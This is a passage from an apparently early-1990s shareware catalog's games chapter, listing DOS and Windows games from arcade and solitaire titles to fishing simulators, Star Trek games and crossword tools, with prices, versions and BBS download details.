is based on how fast you can + pin your opponent and how many moves you can make during the + pin. The key will let you speed up or slow down the + action. + + Product: Gopher's Garden + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 1.1 (06-17-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: GARDEN.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 59k + Description: + There's trouble in the garden! You are in the midst of a + gopher invasion and they're tearing up the place. You must + find the pesky critters and get rid of them before they eat all + of your flowers. It isn't easy because you can't actually see + them. All you see is the flowers disappearing and an + occasional mound of dirt. While trying to catch them be + careful to avoid crushing your own flowers. Mouse support is + provided as an automatic option. + + Product: HowTwo + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 2.1 (02-05-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: HOWTWO.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 66k + Description: + A build-it game. You must collect all of the robot part boxes + in the 10-story building and take them to the laboratory for + assembly. Watch your battery supply. If you don't have enough + power to run the elevator and lifts, you can get stranded. The + + Chapter 17, "Games" 365 + + + + elevator and lifts sometimes need repairing so they work + reliably. Look out for the berserk Stock Clerk Robot. It + takes boxes to its attic stockroom and raids the batteries. + + Product: HUGO II, WHODUNIT? + 3-D EGA Graphics adventure game. See full description on + page 378. + + Product: HUGO'S HOUSE OF HORRORS + EGA 3-D Graphics Adventure Game. See full description on + page 378. + + Product: Jewel Thief + Needs: IBM AT (80286), Windows 3.0 or better. Mouse; EGA + monitor. + Author: ServantWare, 313-741-1711 + Registration: $10.00 + Version: 1.2 (02-08-92) + User benefits: Receive code for removing registration screens. + Look for: JWLTHF.ZIP on BBSs (call 313-663-4173 to download it at + no charge); JWLTHF.ZIP in WINADV forum LIB 6 on CompuServe. + Download size: 44k + Description: + This exciting Windows lets you visit exotic places and collect + jewels while avoiding restless natives. Three speed levels, + high scores, accelerators, and pause options. A top notch + Windows program that integrates excellent use of graphics and + animation. + + Product: MaxMan + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 1.2 (05-28-90) + User benefits: Latest version, free updates for 6 Months, & 24 Hr + Tech Support. + Look for: MAXMAN.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 44k + Description: + Similar to PAC-MAN, but with innovative additions that make + this arcade game even more enjoyable. In MaxMan, you start out + as a skinny guy. When you get one of the magic apples, you + gain sufficient energy to change shape and destroy green + gremlins for a while. You lose strength for each step you + take. If one of the gremlins gets you, your ghost may turn + into what I call a Grim Reaper. + + Chapter 17, "Games" 366 + + + + Product: Shooting Gallery + Needs: IBM PC, DOS 2.1 or better. VGA monitor; mouse. + Author: Arcanum Computing + Registration: $15.00 + Version: 2.3 (12-16-91) + User benefits: Master disks. + Look for: SHOOTG23.ZIP on BBSs (call 508-875-3618 to download it + at no charge); SHOT23.ZIP in GAMERS forum LIB 7 on CompuServe. + Download size: 118k + Description: + An action/arcade game which uses 256 color MCGA graphics mode. + Seven rounds of play are included, with different targets and + objectives on each round. Includes practice mode, high score + hall of fame, extensive statistics, etc. + + Product: Spider Web + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 1.4 (03-04-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: SPIDER.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 63k + Description: + A crazy exercise, with a mouse or joystick, in which you must + spin a web to catch all of the flies before they over-populate. + The most effective web, although you can make it anyway you + want, looks like the ones a real garden spider spins. The best + scores are achieved by keeping the number of flies trimmed to a + small number and playing for as long as possible. Webs can + also be spun with just the cursor keys. + + Product: Spin Wall + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 1.6 (05-28-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: SPINWALL.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 56k + Description: + In this colorful maze game, you are a ghost who can walk + through walls matching the colors of the magic keys you can + collect. At first, all of the walls are solid. Pressing the + "SPIN" key makes the corners of the walls spin at random, to + open different doorways. Each spin costs one of the gems you + must collect. Bumping solid walls or knocking over paint cans + costs extra points. The object is to maneuver through the + maze, collect keys and gems, and get to the winners circle in + the fewest steps. + + Chapter 17, "Games" 367 + + + + Product: SuperFly + Needs: IBM PC, DOS 2.1 or better. EGA monitor. + Author: Arcanum Computing + Registration: $15.00 + Version: 1.1 (10-29-90) + User benefits: Master disks, set of hints. + Look for: SFLY11.ZIP on BBSs (call 508-875-3618 to download it at + no charge); SFLY11.ZIP in GAMERS forum LIB 7 on CompuServe. + Download size: 79k + Description: + An all new action game by Nels Anderson, author of Mah Jongg, + EGATrek, etc. Uses hi-res graphics mode and requires an EGA or + VGA card to play. Chase the flies and other insect invaders + through 20 different rounds. Includes 3 levels of difficulty, + shell to DOS, high score hall of fame, etc. Use mouse, + joystick or keyboard to play. + + Product: TiltMaze + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 1.1 (10-01-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: TILTMAZE.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 66k + Description: + Get as many balls into the center as you can. It's not easy, + when you "tilt" the maze with the cursor keys, all of the balls + start rolling in the same direction. The bigger the tilt the + faster they roll. Oh! You also have to keep the balls from + getting zapped by one of the electric grids. If you have an + ASCII text editor, you can redesign the maze. + + Product: Volcano Hunter + Save the city from the Volcano Druts. See full description on + page 379. + + Product: Vortex + Needs: IBM PC, DOS 3.0 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 1.2 (04-06-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: VORTEX.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 72k + Description: + How tornadoes pick up and drop things inspired Vortex. The + idea is to trap as many of the tornadoes as possible. Each + tornado picks up and drops blocks at random and can set others + free. They can only carry one at a time but you can pick up + + Chapter 17, "Games" 368 + + + + three. The color density of the cursor increases each time you + pick up a block. If you have one or more blocks and are not + moving you are safe. Otherwise, if a tornado catches you, it + will pick YOU up and the game ends. + + Product: ZZT Arcade-Adventure Game + Needs: IBM PC, DOS 2.0 or better. + Author: Potomac Computer Systems + Registration: $14.95 + Version: 3.0 (06-10-91) + User benefits: Bonus 'Caves of ZZT' world + Game hints + ZZT + Newsletter. + Look for: EXEC PC on BBSs; ZZT30.ZIP in IBMNEW forum LIB 6 on + CompuServe; ZZT.ZIP in GAMES RT RTC LIB 6 on GEnie. + Download size: 115k + Description: + A much-improved version of the 1991 arcade-adventure game hit + that took the gaming world by storm! Over 10,000 players have + battled the tantalizing monsters and pondered the synthetic + puzzles occupying the 36 rooms in Town of ZZT. + + Tests your brain power as well as your reflexes and is very + entertaining for novices and pros alike. Includes a full game + editor so you can create your own complete ZZT worlds. + st + A Four-part epic series. Shareware version contains the 1 + world & ZZT editor. + + + 17.6 Card games + + Product: BlackJack! + Blackjack simulation / tutor. See full description on + page 372. + + Product: BridgePal + Needs: IBM PC, DOS 2.0 or better. + Author: WR Software, 415-930-0369 + Registration: $9.95 + Version: 2.02 (04-29-90) + User benefits: Latest Version, bonus additional program from WR + Software. + Look for: BPAL202.ZIP on BBSs (call 415-937-0156 to download it + at no charge). + Download size: 150k + Description: + Deals random hands and lets you bid and play any way you wish. + Help features for beginners: optional hand point count, + optional recommended bid. Two player options let you compete on + the same hands with another player. Best hand option to + increase offensive practice. Replay any hand at any time for + interesting/chalenging hands. Rotate hands to play from the + other teams perspective. + + Chapter 17, "Games" 369 + + + + Product: Hearts + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: CareWare, 916-477-6024 + Registration: $15.00 + Version: 6c (01-15-92) + User benefits: Phone/CompuServe/mail support. + Look for: availability unknown on BBSs; HEART6.ZIP in IBMNEW + forum LIB 8 on CompuServe. + Download size: 65k + Description: + Featured in COMPUTE! magazine and is acclaimed by many users to + be the best Hearts game they have experienced. You try your + luck against three computer players with control over several + users options. Offers full mouse support, ease of play and fun + for the whole family. + + Product: MEMORY + Needs: IBM PC, DOS 2.1 or better. + Author: Jimmy Paris Software, 804-295-5496 + Registration: $5.00 + Version: 2.2R (04-01-91) + User benefits: User support without limit. + Look for: MEMORY.ZIP on BBSs. + Download size: 22k + Description: + A computer version of the card game of Concentration. A deck of + 54 cards is lied out face down. You try to match cards. There + are 13 double pairs and one single. The default cards are + animals, but you can supply your own. Up to four people can + play. The game was written for 7 and 8 year old children and is + useful in helping them learn to read. + + Product: Mille French Card Game + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Unique Software + Registration: $19.95 + Version: 1.2 (11-15-91) + User benefits: Reduced rate upgrades; notification of major + upgrades; tech support by Fax and/or CompuServe Mail. + Look for: MILLE12.EXE on BBSs; MILLE1.EXE in IBMNEW forum LIB 6 + on CompuServe. + Download size: 93k + Description: + A 100% CGA graphics game of the popular French card game Mille + Bournes. Complete interactive instuctions can be chosen before + the start of the game. If you're tired of card games of + "telling" you your hand, this is the game you've been looking + for! Single Player Version. + + 17.6.1 Poker + + Product: EM Poker Solitaire + EGA solitaire card game. See full description on page 371. + + Chapter 17, "Games" 370 + + + + Product: Get Lucky! + Adult oriented trivia & poker. See full description on + page 389. + + 17.6.2 Solitaire + + Product: Calculation Solitaire + Needs: IBM PC, Windows 3.0 or better. + Author: Daniel Thomas, 714-524-5625 + Registration: $17.00 + Version: 1.12 (12-23-91) + User benefits: Disk, printed manual. + Look for: availability unknown on BBSs; CLCSOL.ZIP in WINADV + forum LIB 6 on CompuServe. + Download size: 71k + Description: + A solitaire card game for Windows 3.0. Skill plays an important + part in this game. Features: Card-Dragging, Skill Levels, Top + Scores, Undo, On-Screen Hints, Changing Card Backs, and more. + + Product: Canfield For Windows + Needs: IBM PC, Windows 3.0 or better. + Author: Daniel Thomas, 714-524-5625 + Registration: $17.00 + Version: 1.01 (01-04-92) + User benefits: Disk, printed manual. + Look for: availability unknown on BBSs; CANFLD.ZIP in WINADV + forum LIB 6 on CompuServe. + Download size: 103k + Description: + From the author of ZiPaper and Calculation Solitaire comes a + new Windows solitaire card game. One beta tester said: "You + have the best computer card program that I've ever tried." Give + it a try and decide for yourself. Tons of bells and whistles, + including the ability to cheat! + + Product: EM Klondike + Needs: IBM PC, DOS 2.1 or better. EGA monitor, 384K RAM. + Author: EM Software + Registration: $15.00 + Version: 3.01 (05-01-91) + User benefits: Printed manual and latest version on disk. + Look for: KLONDK30.ZIP on BBSs (call 209-683-2084 to download it + at no charge); KLDK30.EXE in IBMJR forum LIB 8 on CompuServe; + KLONDK30.EXE in IBMPC RTC LIB 7 on GEnie. + Download size: 125k + Description: + Outstanding implementation of the classic solitaire game. Great + EGA graphics, sound, three variations, mouse support, Top Ten + lists. "You can look at a lot of shareware card ganes, but I + doubt you'll find one that tops EM Klondike in any respect." - + Dr. File Finder's Guide to Shareware, Osborne-McGraw Hill, + 1990. "Klondike from EM Software shows a level of + professionalism in design and implementation that surpasses + + Chapter 17, "Games" 371 + + + + much commercial software." - Barry Brenesal, PC Sources, May + 1991. + + Product: EM Poker Solitaire + Needs: IBM PC, DOS 2.1 or better. EGA monitor, 384K RAM. + Author: EM Software + Registration: $15.00 + Version: 2.0 (05-30-91) + User benefits: Latest version on disk, printed manual. + Look for: PKRSOL20.ZIP on BBSs (call 209-683-2084 to download it + at no charge); PSOL20.EXE in IBMNEW forum LIB 8 on CompuServe; + PKRSOL20.EXE in IBMPC RTC LIB 7 on GEnie. + Download size: 120k + Description: + Great solitaire card game. Place cards one by one on a 5x5 + grid; score each row and column as a Poker hand. Excellent EGA + graphics, music, mouse support, three variations, two scoring + systems, Top Ten lists, the works! From the same author of EM + Klondike and EM Pyramid. If you like solitaire card games, give + this one a try! "Poker Solitaire has me hooked - just as your + Klondike did!" - Ed Rochelle, Dix Hills, NY. + + Product: EM Pyramid + Needs: IBM PC, DOS 2.1 or better. EGA monitor, 384K RAM. + Author: EM Software + Registration: $15.00 + Version: 1.07 (05-30-91) + User benefits: Latest version on disk and printed manual. + Look for: PYRMID10.ZIP on BBSs (call 209-683-2084 to download it + at no charge); PYRD10.EXE in IBMNEW forum LIB 8 on CompuServe; + PYRMID10.EXE in IBMPC RTC LIB 7 on GEnie. + Download size: 130k + Description: + Great EGA solitaire card game. Clear the pyramid by removing + pairs of cards that total thirteen. Outstanding EGA graphics, + music, mouse support, Top Ten lists. Tournament play against + another play or the computer. From the same author of EM + Klondike. "I thought it would be impossible to outdo Klondike!" + - David Hardy, San Francisco, CA. "One of the most fascinating + games for the computer." - Robert Van Dyke, Lancaster, OH. + + Product: PATIENCE 10 + Needs: IBM PC, DOS 2.1 or better. + Author: CoCoWare - Cowles Company Software, 817-249-0821 + Registration: $10.00 + Version: 3.31 (06-11-91) + User benefits: Printed documentation; upgrade notices; mail + support. + Look for: availability unknown on BBSs. + Download size: 200k + Description: + A collection of 10 popular solitaire games all run from a + single menu. The games include Accordion, Canfield, Dimaryp, + Eliminate, Golf, Klondike, Nestor, Pyramid, Stacker, and Vegas. + + Chapter 17, "Games" 372 + + + + Each game features its own best scores table. Best scores are + determined using everything from cards remaining and mistakes + made to the time it took to play. Documentation covers rules + and strategies for all ten games. Customer color setup is + provided and a mouse is fully supported. Addictive! + + + 17.7 Non-card games + + Product: BRAINdead2 + Needs: IBM PC, DOS 2.1 or better. EGA monitor (must have 640x350 + resolution capability). + Author: Michael Donat, 501-442-0301 + Registration: $10.00 + Version: 1.00 (09-04-91) + User benefits: Include an extra $5 for latest version on disk. + Look for: BD2.ZIP on BBSs. + Download size: 51k + Description: + Features two distinct games in a single program - a hidden tile + match game that tests memory skills and a visible tile match + game that pits the player against the clock. Tile contents may + be set to numbers, letters or colors for matching. Mouse or + keyboard control is provided. + + The game was originally written because there are so few PC + games that our five year old could play without help. Kids do + really well! As for adults - the name says it all. + + + 17.8 Casino games + + Product: BlackJack! + Needs: IBM PC, DOS 2.0 or better. EGA or Hercules monitor. + Author: Glencoe Computing, 314-458-2863 (EVE) + Registration: $29.99 + Version: 2.21p (06-05-91) + User benefits: Latest version, full support, optional printed + docs ($5 surcharge). + Look for: BJ-221.EXE on BBSs; BJ221.EXE in IBMNEW forum LIB 8 on + CompuServe. + Download size: 150k + Description: + An accurate simulation of the game Blackjack as played in + American and foreign casinos. Splitting, doubling-down, + insurance and surrender are all supported depending on "house + rules". The thorough documentation, sophisticated practice + drills and extensive statistics help the user reach any level + of expertise. The finest, most fun way to learn Blackjack. The + comments of hundreds of registered users can be summed up in 5 + words - "The Best I've Ever Seen!". Super high quality + graphics + + Chapter 17, "Games" 373 + + + + 17.9 War games + + Product: RoDrones + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 1.2 (02-04-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: RODRONE.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 60k + Description: + This is a challenging game in which you must think in three- + dimensions to succeed. You must position your Robot Drones + close enough to the intruders in your space sector to destroy + them when they are "fired". After positioning, the RoDrones + will report their distance to any intruders. For advanced + play, the game will print a graph you can use with a compass to + help calculate the intruder positions. + + + 17.10 Simulators + + Product: 3 ball Juggler + Needs: IBM PC, DOS 2.1 or better. EGA monitor. + Author: First Magnitude, 513-436-0232 + Registration: $15.00 + Version: 1.13 (12-08-91) + User benefits: Disk with latest version, additional illustrated + material, discount on 5 ball version, phone support. + Look for: availability unknown on BBSs; JUGLE3.ZIP in GAMERS + forum LIB 4 on CompuServe. + Download size: 100k + Description: + Program uses high resoultion animated graphics to teach three + ball juggling. Complete lessons are provided from introduction + through several tricks. A game section is included that + simulates juggling with arcade-game like action. Three levels + of play are provided. The easy level can be mastered in + minutes. The hard level involves performing "tricks" and is + very challenging. + + Chapter 17, "Games" 374 + + + + Product: FIELD GENERAL + Needs: Unknown. Hard disk, CGA monitor, 512k RAM. + Author: rbm software, 512-388-0830 + Registration: $19.98 + Version: 5.0 (08-27-91) + User benefits: Latest version of software, supplement to Users + Manual (technical material), discounted subscription rate to + Shareware Magazine, & inexpensive upgrade offers. + Look for: availability unknown on BBSs. + Download size: 280k + Description: + Game features: 60 offensive & 17 defensive plays producing + over 34,800 possible results, auto or manual play, real-time + game clock & play clock, two-point conversion option, weather + elements, turnovers, penalties, angle punts, fake punts & field + goals, onside kicks, squib kicks, blocked kicks, QB traps, time + outs, no-huddle offense simulation, halftime show, instant + replay feature, NFL or WLAF rules option, regulation length or + short game option, full set of game stats & records, and much + more! + + Product: The LOTTO SIMULATOR + See how your picks stand up against the odds. See full + description on page 336. + + Product: MAZE3 + Needs: IBM PC, DOS 2.1 or better. + Author: Stiller Research, 904-575-7884 + Registration: $12.00 + Version: 3.0.6 (01-19-89) + User benefits: Master disks. + Look for: availability unknown on BBSs; MAZ3.EXE in IBMNEW forum + LIB 6 on CompuServe. + Download size: 64k + Description: + Allows you to create a unigue maze of any size and then explore + it. You see realistic 3D views of the interior of the maze. + Maze provides advanced pallete switching graphics for EGA/VGA + adpaters but Maze will even work on non-graphics adapters in a + special character graphics mode. You explore the maze using a + compass and dropping markers to find your way. You may print a + complete map of the maze when you quit or find your way out of + the maze. + + Product: PC-HAM + HAM logging, contest and SS game simulation. See full + description on page 338. + + Chapter 17, "Games" 375 + + + + 17.10.1 Sports + + Product: Bass Class + Needs: IBM PC, DOS 1.0 or better. 512k RAM; EGA monitor. + Author: Olsen Outdoors, 508-486-3042 + Registration: $15.00 + Version: 1.2 (03-22-91) + User benefits: Newest version sent. Unlimited CIS/phone/mail and + BBS support. + Look for: BASSCL12.ZIP on BBSs (call 508-875-3618 to download it + at no charge); BASSCL.ZIP in GAMERS forum LIB 6 on CompuServe. + Download size: 176k + Description: + A fishing game and a whole lot more. Lots of on-screen help + with your fishing. There's even an on-screen glossary of + fishing terms. It has a great user interface. Comes with six + new lakes to fish that are BassTour compatible. Other lakes are + available from the author. With this game you can actually + learn how to fish for bass while having fun while you play. If + you're already a fishing fanatic, you can use it to hone your + skills! Full mouse support too. + + Product: BassTour + Needs: IBM PC, DOS 2.0 or better. 512k RAM; CGA or Hercules + monitor. + Author: Olsen Outdoors, 508-486-3042 + Registration: $15.00 + Version: 4.5 (03-26-91) + User benefits: Newest version sent. Unlimited phone, CIS, mail, + and BBS support. + Look for: BASSTR45.ZIP on BBSs (call 508-875-3618 to download it + at no charge); BASSTR.ZIP in GAMERS forum LIB 6 on CompuServe. + Download size: 158k + Description: + The ULTIMATE fishing game. You'll fish a three day tournament + against 30 of the top names in bass fishing. You'll do it in a + fully rigged bass boat. You've got six different fishing rods + and over 2300 lure/color combinations. The boat has a trolling + motor, a powerful outboard motor, various emergency and safety + devices and even an on-screen LCD fish finder. Comes with six + different lakes to fish (others are available from the author) + and provides mouse support. + + Chapter 17, "Games" 376 + + + + 17.11 Star Trek & Star Wars + + Product: EGATrek + Needs: IBM PC, DOS 2.1 or better. EGA monitor. + Author: Arcanum Computing + Registration: $15.00 + Version: 3.0 (01-22-92) + User benefits: Master disks. + Look for: EGATRK30.ZIP on BBSs (call 508-875-3618 to download it + at no charge); EGAT30.ZIP in GAMERS forum LIB 7 on CompuServe. + Download size: 116k + Description: + A colorful, hi-res version of the classic computer game. The + player is put in control of a powerful starship in a battle to + save the universe. The computer screen simulates the captain's + command console with scanners, messages, damage control and + even a view outside the ship. Score is based on the time needed + to complete the mission with bonuses for rescues, ships + destroyed, etc. Supports only EGA graphics. + + Product: STARTREK the Computer Program + Needs: IBM PC, DOS 2.0 or better. + Author: Software for Amateur Radio, 301-593 6136 + Registration: $15.00 + Version: 1.00 (05-25-90) + User benefits: support, and free updates. + Look for: TREKBOOK on BBSs (call 301-593 9067 to download it at + no charge). + Download size: 200k + Description: + The techniques used in writing a good game are the same that + programmers use in professional activities. Writing a good game + poses a challenge that allows you to develop good habits and + techniques for programming and also allows you to learn a + language in an interesting manner. + + This product teaches the techniques for writing such a game + using the STARTREK game as an example, and BASIC as the + programming language in which to write the code. + + Product: Super StarTrek + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 5.5 (01-12-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: SUPRTREK.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 102k + Description: + A strategy game that's similar to the public domain version of + "STARTREK" but with sophisticated differences. If you like + Star Trek, you'll really like this one! Don't forget to set + + Chapter 17, "Games" 377 + + + + your shields right after signing on as Captain of the + Enterprise. The Klingons won't wait to fire. You'll hear + lot's of sound while you control the fate of the Enterprise in + your sector of the Galaxy. You are given a fixed amount of + time to explore, find, and destroy all of the Klingon ships. + + + 17.12 Trivia + + Product: Computer Trivia Quiz + A learning game to enhance Computer Literacy. See full + description on page 289. + + Product: Get Lucky! + Adult oriented trivia & poker. See full description on + page 389. + + Product: I.Q. Challenge [***] + Needs: IBM PC, DOS 2.1 or better. + Author: R.K. West Consulting + Registration: $15.00 + Version: 1.23 (03-01-92) + User benefits: Free mail support, 900-number phone support, + printed manual, new game, upgrade notices. + Look for: IQ.ZIP on BBSs; IQ.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Compete against yourself or others in 5 categories of + knowledge. Your choice of 3 levels of play determines speed and + points earned. Each player can print a certificate of + achievement and could be listed as a Genuine Genius! + + Product: the last word + Needs: IBM PC, DOS 2.1 or better. + Author: Bit Masons Consulting, 508-898-3321 + Registration: $15.00 + Version: 1.00 (11-25-90) + User benefits: Minimum 90 days phone/BBS/mail support. Disk with + additional questions and registration number to eliminate + reminder screen. Coupon for discount on other author products. + Look for: LWORD100.ZIP on BBSs; LW100.ZIP in GAMERS forum LIB 13 + on CompuServe. + Download size: 150k + Description: + A quotations trivia game in which 1 to 4 players compete + against each other and their own high scores in identifying the + source of quotations and completing partial quotes. Most + answers are entered free-form and are matched against a set of + acceptable responses by a sophisticated pattern-recognition + algorithm and, thus, the program is very forgiving when it + comes to misspelled or abbreviated answers. The user can + customize settings such as typing time for each player. + + Chapter 17, "Games" 378 + + + + 17.13 Adventure + + Product: First Expedition + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Steve Englestad + Registration: $23.90 + Version: 4.0 (01-01-92) + User benefits: Published charts, hint/background story book, + protractor, technical support. + Look for: availability unknown on BBSs. + Download size: 400k + Special instructions: Product distribution restricted to the + United States. + Description: + An extensive story-telling adventure. Navigate by night stars. + Day and night phases with fog, storm, pirates and friendly + craft, sea beasts and islands rising over the horizon. First + person perspective while at sea Medical kits restore health. + Survey missiles to scan area around you. Search through mazes. + Watch out for Biobotic robots. You are accompanied on your + quest by a First Mate who 'talks' to you with suggestions and + warnings. Tongue in cheek humor. + + Product: HUGO II, WHODUNIT? + Needs: IBM PC, DOS 3.0 or better. EGA monitor; 1MB of disk + space. + Author: Gray Design Associates + Registration: $20.00 + Version: 1.1 (06-02-91) + User benefits: Hint booklet, Playback mode, HUGO'S HOUSE OF + HORRORS. + Look for: availability unknown on BBSs; HUGO2.EXE in IBMNEW forum + LIB 3 on CompuServe. + Download size: 330k + Description: + It's adventure time again as Hugo and Penelope get swept up in + another superbly animated 3D adventure. This time a murder + mystery is afoot with a couple of fiendish twists and a large + helping of humor. Just look what's in store - a revolving + bookcase, a saucy French maid and a murderer! Over 50% bigger + than the original Hugo's House of Horrors! If you enjoyed Hugo + 1 you'll love the sequel. + + Chapter 17, "Games" 379 + + + + Product: HUGO'S HOUSE OF HORRORS + Needs: IBM PC, DOS 3.0 or better. EGA monitor; 1MB of disk + space. + Author: Gray Design Associates + Registration: $20.00 + Version: 1.6 (06-02-91) + User benefits: Hint booklet, playback mode, HUGO II, WHODUNIT? + Look for: availability unknown on BBSs; HUGO.EXE in IBMNEW forum + LIB 3 on CompuServe. + Download size: 230k + Description: + Voted one of the top ten all-time best shareware games! Using a + combination of colorful 3-D EGA animation and text. You + control HUGO'S destiny as he tries to rescue his sweetheart, + Penelope, imprisoned somewhere inside the haunted house, and + must solve the various puzzles and challenges encountered + during his quest. + + Product: MAZE3 + 3D Maze/Cave creation and exploration game. See full + description on page 374. + + Product: T-Zero + Needs: IBM PC, DOS 2.1 or better. 256k RAM. + Author: Dennis Cunningham + Registration: $15.00 + Version: 1.03 (05-19-91) + User benefits: Most recent version complete with a context- + sensitive hint facility. + Look for: T-ZERO.ZIP on BBSs (call 414-789-4210 to download it at + no charge); T-ZERO.ZIP in IBMNEW forum LIB 3 on CompuServe; T- + ZERO.ZIP in IBMPC RTC LIB 7 on GEnie. + Download size: 232k + Description: + This game, mixing elements of fantasy and science fiction while + exploring the nature of time, is dedicated to all gamers + saddened by the premature death knell sounded for text + adventures. Scenes take place in a rustic but disturbing + present; a bustling prehistoric era; and a damaged, + bureaucratic future. Features: input buffer, player-definable + function keys, DOS shell, Restart/Save/Restore/Undo, + directional or cursor keyboard control, produce hard copy of + game's prose. Advanced difficulty level. + + Product: Volcano Hunter + Needs: IBM AT (80286), DOS 3.1 or better. 16MHz or faster + computer. VGA monitor. + Author: Informative Technologies, 202-675-4528 + Registration: $10.00 + Version: 1.0 (06-15-91) + User benefits: A printed map of the screens in Volcano Hunter; + Several evaluation versions of other software from Informative + Technologies; A certificate for $7 off a subscription to + + Chapter 17, "Games" 380 + + + + Shareware Magazine; A certificate for a free CompuServe + membership. + Look for: VOLCANO.ZIP on BBSs (call 301-596-1180 to download it + at no charge); VOLCAN.ZIP in IBMNEW forum LIB 3 on CompuServe. + Download size: 55k + Description: + Monsters, treacherous ledges, hot lava, water-filled caverns, + conveyor belts, moving platforms, beamers, secret doors, + hotplates, timer bombs and more contribute to the action. Over + 200 screens of cities, mountains and caverns. Blow up, burn up, + drown, fall to your death or be killed by the Druts. But, you + could survive and escape with gold beyond your imagination and + save the city. + + Product: ZZT Arcade-Adventure Game + Lots of arcade action & puzzle solving. See full description + on page 368. + + + 17.14 Word games + + Product: Babble! + Creativity tool for writers. See full description on page 130. + + Product: Cipher + Needs: IBM PC, DOS 2.1 or better. + Author: Arcanum Computing + Registration: $15.00 + Version: 2.1 (10-09-91) + User benefits: Master disks, additional puzzles. + Look for: CIPHER21.ZIP on BBSs (call 508-875-3618 to download it + at no charge); CIPHER.ZIP in GAMERS forum LIB 13 on CompuServe. + Download size: 87k + Description: + A crypto-quotes type word puzzle game, similar to the kind you + might find in the Sunday newspaper. However, this version runs + in colorful hi-res VGA or EGA graphics mode and allows you to + play using a mouse (text modes and keyboard are also + supported). Features include help, hints, save/restore. User + can create their own puzzle files from either plain text quotes + or from already encrypted quotes. + + Chapter 17, "Games" 381 + + + + Product: Cipher for Windows + Needs: IBM PC, Windows 3.0 or better. + Author: Arcanum Computing + Registration: $15.00 + Version: 1.0 (10-02-91) + User benefits: Master disks, additional puzzles. + Look for: CIPHWN10.ZIP on BBSs (call 508-875-3618 to download it + at no charge); CIPHWN.ZIP in GAMERS forum LIB 13 on CompuServe. + Download size: 112k + Description: + A crypto-quotes type word puzzle game, similar to the kind you + might find in the Sunday newspaper. However, this version runs + in colorful hi-res VGA or EGA graphics mode under the Microsoft + Windows 3.x environment and allows you to play using a mouse. + Features include standard Windows style hypertext help, hints, + save/restore. User can also create their own puzzle files from + plain text or already encrypted quotes. + + Product: CROSSDOWN + Needs: IBM PC, DOS 3.0 or better. EGA/VGA monitor. Mouse. + Author: Sam Bellotto Jr., 716-482-8092 + Registration: $25.75 + Version: 2.6 (02-24-92) + User benefits: Printed manual; additional puzzles. Unlimited + support. Crossword construction critiquing and tutoring. + Look for: availability unknown on BBSs; XDOWN2.ZIP in IBMNEW + forum LIB 8 on CompuServe; XDOWN26.ZIP in IBMPC RTC LIB 7 on + GEnie. + Download size: 149k + Description: + Developed by a professional crossword puzzle constructor, it + features an attractive mouse-based graphics interface, animated + selection buttons, and sound effects. It is as intuitive to use + as working the puzzles in your daily newspaper. And it even + features a construct option for you to make your own! Any + puzzle can be optionally printed out with standard puzzle + numbering added automatically. The package includes seven + sample crossword puzzles of varying sizes. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 124. + + Chapter 17, "Games" 382 + + + + Product: Crossword Creator + Needs: IBM PC, DOS 2.1 or better. 320k RAM; IBM-compatible + printer. + Author: PC HELP-LINE, 714-797-3091 + Registration: $50.00 + Version: 5.00 (02-01-92) + User benefits: Printed manual, master disks, technical support. + Look for: CWC.ZIP on BBSs; CWC.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 224k + Description: + This crossword puzzle "editor" gives you all the tools you need + to quickly design and print your own crosswords. Pull-down + menus, mouse support, comprehensive on-line help. Can generate + freeform puzzles from a word list or ASCII file. + + Works with a companion program, Crossword Clipper for Windows, + so you can paste your puzzles into desktop publishing + applications. A great tool for trainers and teachers, great + fun for trainees and students. Spanish and French versions + available. + + Product: CROSSWORD POWER + Needs: IBM PC, DOS 2.1 or better. 320k RAM; any printer with IBM + high-ASCII character set. + Author: WISCO Computing, 715-423-8189 + Registration: $41.95 + Version: 4.00 (01-02-92) + User benefits: Latest version, printed manual, telephone and BBS + support, LaserJetII & DeskJet fixed-width soft fonts included, + additional word lists. + Look for: CROSSWDL.ZIP on BBSs (call 715-435-3855 to download it + at no charge). + Download size: 194k + Description: + Make crossword puzzles from your 